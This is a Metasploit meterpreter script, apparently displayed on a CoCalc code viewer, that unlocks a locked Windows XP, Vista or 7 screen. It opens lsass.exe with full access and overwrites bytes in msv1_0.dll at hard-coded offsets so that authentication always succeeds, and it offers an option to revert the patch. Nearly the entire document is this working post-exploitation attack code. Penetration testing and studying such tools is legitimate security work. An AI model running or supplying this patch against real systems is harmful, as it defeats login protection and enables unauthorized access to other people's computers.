CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8

9
#
10
# Script to unlock a windows screen by L4teral <l4teral [4t] gmail com>
11
# Needs system prvileges to run and known signatures for the target system.
12
# This script patches msv1_0.dll loaded by lsass.exe
13
#
14
# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
15
#
16

17
revert = false
18
targets = [
19
  { :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
20
  { :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
21
  { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
22
  { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
23
  { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
24
  { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
25
]
26

27
opts = Rex::Parser::Arguments.new(
28
  "-h" => [ false,"Help menu." ],
29
  "-r" => [ false, "revert the patch (enable screen locking again)"]
30
)
31
opts.parse(args) { |opt, idx, val|
32
  case opt
33
  when "-r"
34
    revert = true
35
  when "-h"
36
    print_line("")
37
    print_line("USAGE:   run screen_unlock [-r]")
38
    print_line(opts.usage)
39
    raise Rex::Script::Completed
40
  end
41
}
42
def unsupported
43
  print_error("This version of Meterpreter is not supported with this Script!")
44
  raise Rex::Script::Completed
45
end
46
unsupported if client.platform != 'windows'
47
os = client.sys.config.sysinfo['OS']
48

49
targets.each do |t|
50
  if os =~ t[:os]
51
    target = t
52
    print_status("OS '#{os}' found in known targets")
53
    pid = client.sys.process["lsass.exe"]
54
    p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
55
    dllbase = p.image["msv1_0.dll"]
56

57
    sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
58
    if sig != target[:sig]
59
      print_error("found signature does not match")
60
      next
61
    end
62
    old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
63
    if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
64
      print_error("found code does not match")
65
      next
66
    end
67

68
    print_status("patching...")
69
    new_code = revert ? target[:orig_code] : target[:patch]
70
    p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
71

72
    written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
73
    if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
74
      print_status("done!")
75
      raise Rex::Script::Completed
76
    else
77
      print_error("failed!")
78
      next
79
    end
80
  end
81
end
82

83
print_status("no working target found")
84

85

86